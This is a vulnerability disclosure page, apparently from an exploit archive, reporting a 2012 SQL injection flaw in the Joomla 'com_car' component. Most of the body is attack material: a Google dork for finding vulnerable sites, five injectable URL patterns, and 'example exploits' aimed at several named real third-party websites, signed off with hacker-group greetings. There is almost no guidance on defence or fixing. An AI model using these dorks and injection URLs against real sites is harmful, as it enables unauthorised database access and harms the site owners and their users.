Joomla com_car SQL Injection

2012.01.22
Credit: the_cyber_nuxbie
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"/index.php?option=com_car\"

[ Joomla Component com_car SQL Injection Vulnerability 0day ] #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Found : 20 January 2012 - 07:45 PM. #[~] Tested On : Windows 7 Ultimate. #[~] Google Dork : inurl:"/index.php?option=com_car" [x] exploits: http://localhost/index.php?option=com_car&view=product&modelsid=[SQLi] http://localhost/index.php?option=com_car&view=product&task=showAll&markid=[SQLi] http://localhost/index.php?option=com_car&brand_id=[SQLi] http://localhost/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi] http://localhost/index.php?option=com_car&view=product&markid=&modelsid=[SQLi] - Example Exploits: http://mtcauto.com.vn/index.php?option=com_car&view=product&modelsid=3' [SQLi] http://qnoithat.com/index.php?option=com_car&view=product&task=showAll&markid=1' [SQLi] http://carwholesale.com/index.php?option=com_car&brand_id=1' [SQLi] http://mison.vn/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=70' [SQLi] http://noithathungdung.com.vn/index.php?option=com_car&view=product&markid=&modelsid=3' [SQLi] - N0T35: 0day no more... "n0 d0rk f0r kiddi0t" Thanks To: All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...

References:

http://www.thecybernuxbie.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top